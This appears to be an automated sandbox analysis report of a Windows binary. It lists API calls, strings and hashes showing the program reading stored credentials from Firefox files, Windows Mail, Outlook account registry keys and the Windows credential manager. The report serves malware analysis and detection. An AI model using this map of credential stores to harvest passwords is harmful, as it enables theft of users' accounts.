                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                • API String ID: 1613542760-3138536805
                                                                                                                                                                • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                                                                • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                • memcpy.MSVCRT ref: 004446ED
                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                • memcpy.MSVCRT ref: 00444729
                                                                                                                                                                • memcpy.MSVCRT ref: 0044473B
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00444812
                                                                                                                                                                • memcpy.MSVCRT ref: 00444843
                                                                                                                                                                • memcpy.MSVCRT ref: 00444855
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                • String ID: salu
                                                                                                                                                                • API String ID: 3691931180-4177317985
                                                                                                                                                                • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                • API String ID: 2449869053-232097475
                                                                                                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00443B79
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                                                                                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                Strings
                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                • Salt, xrefs: 00443BA7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                • API String ID: 665470638-2687544566
                                                                                                                                                                • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                                                                                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                • API String ID: 551151806-1288872324
                                                                                                                                                                • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                                                                • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                • API String ID: 2449869053-4258758744
                                                                                                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004042D5
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004042E8
                                                                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                                                                • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00409749
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00409759
                                                                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004097A1
                                                                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                                                                • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                                                                • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                • API String ID: 714388716-318151290
                                                                                                                                                                • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1416211542-0
                                                                                                                                                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                                                                • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                • API String ID: 1831126014-3814494228
                                                                                                                                                                • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004100F2
                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
